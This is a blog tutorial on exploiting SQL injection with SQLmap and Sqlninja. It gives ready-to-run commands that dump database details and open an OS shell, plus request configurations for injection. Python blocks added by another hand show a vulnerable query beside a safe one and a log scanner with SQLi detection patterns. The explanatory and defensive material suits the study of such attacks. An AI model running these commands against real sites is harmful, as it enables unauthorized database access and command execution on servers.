Penetration Test – Exploit with SQL Injection – All things in moderation

Penetration Test – Exploit with SQL Injection

By now you have found some unusual things on the target website. Web application testing findings typically cover areas such as SQL injection (SQLi), cross-site scripting (XSS), cross-site request forgery (CSRF), session token entropy, fuzzing/input validation, and business logic. In this post, I will focus on SQL injection.

SQL Injection

As you know, identifying a SQL injection (SQLi) vulnerability can lead to full control of the database or even the underlying system. At this point I usually turn to two open source tools: SQLmap and Sqlninja.
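To show what this class of bug looks like in application code, here is an added example (mine, not from the post): a Python/sqlite3 stand-in for a lookup like the index.php?id= parameter targeted below, with the string-concatenated query beside a validated, parameterized version. The table and its rows are constructed.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the site's backend (assumption, not from the post).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, uname TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "test", "user")])
    return conn

def lookup_vulnerable(conn, user_id):
    # The raw ?id= value is concatenated into the statement, so anything after the
    # number is parsed as SQL: this is exactly what a probe such as id=-10 feels for.
    sql = "SELECT uname, role FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_id):
    # Two independent defences: the parameter is validated as an integer, and the
    # value is bound through a placeholder so the driver never treats it as SQL.
    try:
        uid = int(user_id)
    except ValueError:
        return []
    return conn.execute("SELECT uname, role FROM users WHERE id = ?", (uid,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "-10 OR 1=1"))   # every row comes back
    print(lookup_safe(db, "-10 OR 1=1"))         # []
```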

I. SQLmap

You can find the official tutorial here, but as usual I will give you my own view of it. SQLmap is my favorite tool for manipulating database queries and dumping databases. It can also set up a Meterpreter backdoor or a VNC session for us.
Here is a quick look at the functions SQLmap provides:

sqlmap -h

[Image: SQLmap help file]

1. We will start with a GET parameter vulnerability, where the SQL injection is located in the URL. We have to test each parameter to make sure we have found a real SQL injection; I have seen a number of false positives, so validation is needed. If we do not specify the value to test, SQLmap will use its default parameters.

  • Finding if an SQL injection is valid

sqlmap -u http://www.xxx.org/index.php?id=-10 -b


  • Get the database username

sqlmap -u http://www.xxx.org/index.php?id=-10 --current-user


  • Turn on an Interactive Shell

sqlmap -u http://www.xxx.org/index.php?id=-10 --os-shell


Because we don't have write permission on this website, our shell could not be uploaded. 😀


If you know the database type and are sure an injection is possible but SQLmap has found nothing, try setting the --dbms="database type" flag.

If you need to test an authenticated SQL injection finding, use Burp to grab the cookie and pass it using the --data="cookie" switch.

2. With a POST parameter vulnerability, the parameters are passed in the request body instead of the URL. Web servers log GET parameters, and you don't want to see passwords in the logs; also, because of the size limitations of the GET method, larger applications pass much of their data as POST parameters.

The example is rather similar to GET, so I have not taken a screenshot here.

  • Finding if an SQL injection is valid

sqlmap -u "http://testphp.vulnweb.com/login.php" --data="uname=admin&pass=admin" -b

  • Get the database username

sqlmap -u "http://testphp.vulnweb.com/login.php" --data="uname=admin&pass=admin" --current-user

  • Turn on an Interactive Shell

sqlmap -u "http://testphp.vulnweb.com/login.php" --data="uname=admin&pass=admin" --os-shell

If you get an os-shell on it, you will have full command line access as the database user.
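Step 2 above notes that web servers log GET parameters; that cuts both ways, because probing of the kind shown in the SQLmap runs above leaves a trail in the access log. This added example (mine, not from the post) scans constructed Apache combined-format log lines for SQLmap's default User-Agent and for decoded SQL metacharacter patterns in query parameters; the IPs, timestamps and requests are all made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines (not from the post); the last three imitate
# a sqlmap run against the index.php?id= parameter used above.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Aug/2016:10:01:02 +0000] "GET /index.php?id=10 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [31/Aug/2016:10:01:03 +0000] "GET /index.php?id=-10 HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.9 - - [31/Aug/2016:10:02:11 +0000] "GET /index.php?id=-10%20OR%201%3D1 HTTP/1.1" 200 4096 "-" "sqlmap/1.0 (http://sqlmap.org)"
198.51.100.9 - - [31/Aug/2016:10:02:12 +0000] "GET /index.php?id=10%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [31/Aug/2016:10:02:13 +0000] "GET /index.php?id=10%27%20UNION%20SELECT%20user%28%29-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
                     r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Matched against the *decoded* parameter value, so %-encoding does not hide a payload.
SQLI_PATTERNS = [
    ("tautology", re.compile(r"\b(or|and)\b\s+\S+\s*=\s*\S+", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark|waitfor)\b", re.I)),
    ("comment-terminator", re.compile(r"(--|#|/\*)")),
]

def scan_access_log(text):
    """Return (ip, path, reasons) for every line that looks like SQLi probing."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        reasons = set()
        # sqlmap's default User-Agent names the tool; a tester can change it, so
        # this is a cheap first signal rather than the only one.
        if "sqlmap" in m["ua"].lower():
            reasons.add("sqlmap user-agent")
        for key, value in parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True):
            for name, pat in SQLI_PATTERNS:
                if pat.search(value):
                    reasons.add(f"{name} in {key}")
        if reasons:
            hits.append((m["ip"], m["path"], sorted(reasons)))
    return hits

if __name__ == "__main__":
    for ip, path, reasons in scan_access_log(SAMPLE_LOG):
        print(ip, path, ", ".join(reasons))
```

The two plain requests, including the bare id=-10 that an application may legitimately see, produce no hit; only the decoded payloads and the tool's User-Agent do.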

II. Sqlninja

First of all, I don't know why, but I love its name. :D It is another wonderful SQL injection tool. With SQLmap and Sqlninja, we have two great tools for our tricks.

A quick look at Sqlninja:

[Image: Sqlninja help file]

The only problem I have found with Sqlninja is that the config file is a bit hard to set up. But that is nothing, because we are pros, right?

In Sqlninja, you just need to mark the vulnerable parameter with the __SQL2INJECT__ placeholder.
Before we use Sqlninja, we need to fill in its configuration file. It contains the URL, the HTTP method, session cookies and a few other details.

The best way to get the required information for Sqlninja is to turn on Burp Suite and capture the request. This step will also give you most of the information needed for the Sqlninja injection.

[Image: Burp request]

  1. We will start with a GET parameter vulnerability. First, we need to write sql_get.conf with the two vulnerable parameters marked.

gedit ~/Downloads/sql_get.conf

and fill in this config:

--httprequest_start--
GET http://testphp.vulnweb.com/userinfo.php?user=test';__SQL2INJECT__&pass=test';__SQL2INJECT__ HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
--httprequest_end--

2. With a POST request, the config is slightly different.

gedit ~/Downloads/sql_post.conf

--httprequest_start--
POST http://testphp.vulnweb.com/userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://testphp.vulnweb.com/login.php
Connection: close
Content-Type: application/x-www-form-urlencoded

user=test';__SQL2INJECT__&pass=test';__SQL2INJECT__
--httprequest_end--

3. Now we are ready to use Sqlninja.

sqlninja -mt -f sql_get.conf


This command runs Sqlninja in test mode to see whether the injection works with our configuration file. If we have a valid SQL injection, we can start attacking the database, like this:

sqlninja -mt -f sql_post.conf


[Image: Sqlninja attacking the database]

If xp_cmdshell is available, we can try for command line access, depending on the privileges we have.

sqlninja -f [configuration_file] -m c

During this test it looks like we are running commands on the server, but we need to validate that. One way is to run tcpdump on a server we control and listen for pings with this command:

tcpdump -nnvXSs 0 -c2 icmp

After this post, I think you know how to deal with SQL injection using SQLmap or Sqlninja. In the next post, we will take a deep look at XSS and CSRF.

2 Comments

  1. xxx August 31, 2016
    • Stephen Stinson August 31, 2016
